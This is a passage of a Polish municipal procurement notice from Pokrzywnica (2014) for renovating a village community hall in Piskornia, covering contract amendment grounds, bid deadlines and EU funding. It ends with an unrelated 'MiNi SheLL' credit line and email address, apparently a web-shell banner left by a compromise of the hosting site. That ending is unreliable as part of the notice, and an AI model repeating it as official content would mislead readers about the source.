4)	konieczność wykonania robót niezbędnych do zakończenia przedmiotu umowy, robót zamiennych i dodatkowych, w tym wynikających z korekty dokumentacji projektowej;
5)	zaistnienia okoliczności utrudniających lub uniemożliwiających terminowe zakończenie przedmiotu umowy takich jak: warunki atmosferyczne, archeologiczne, geologiczne, hydrauliczne, kolizje z sieciami infrastruktury technicznej;
6)	opóźniania, utrudnienia lub przeszkód spowodowanych przez Zamawiającego lub dających się przypisać Zamawiającemu lub innemu Wykonawcy zatrudnionemu przez Zamawiającego na terenie budowy;
7)	działania siły wyższej;
2.	zmiana wynagrodzenia:
1)	w przypadku zmiany stawki podatku VAT w okresie realizacji zamówienia - dotyczy części wynagrodzenia za roboty której nie zafakturowano na dzień wejścia w życie przepisów o zmianie stawki VAT;
3.	Inne zmiany:
1)	zmiana zakresu części zamówienia powierzonej Podwykonawcom;
2)	zmiana osób reprezentujących, pod warunkiem wcześniejszego powiadomienia i akceptacji drugiej strony, w następujących przypadkach:
3)	śmierci, choroby lub innych zdarzeń losowych,
4)	jeżeli zmiana stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Zamawiającego lub Wykonawcy (np. rezygnacji, itp.),
5)	zmiana danych teleadresowych stron umowy;
6)	zaistnienia omyłki pisarskiej lub rachunkowej;
7)	zmiana powszechnie obowiązujących przepisów prawa, w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron;
8)	powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można będzie usunąć w inny sposób, a zmiana będzie umożliwiać doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.pokrzywnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Pokrzywnica
Al. Jana Pawła II nr 1
06-121 Pokrzywnica
pokój nr 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.07.2014 godzina 12:00, miejsce: Urząd Gminy Pokrzywnica
Al. Jana Pawła II nr 1
06-121 Pokrzywnica
pokój nr 2 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Remont i wyposażenie świetlicy wiejskiej w Piskorni wraz z zagospodarowaniem terenu
współfinansowany jest  z Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich
w ramach Działania 413  Wdrażanie Lokalnych Strategii Rozwoju w zakresie operacji odpowiadających warunkom przyznania pomocy w ramach działania  Odnowa i rozwój wsi objętego Programem Rozwoju Obszarów Wiejskich na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com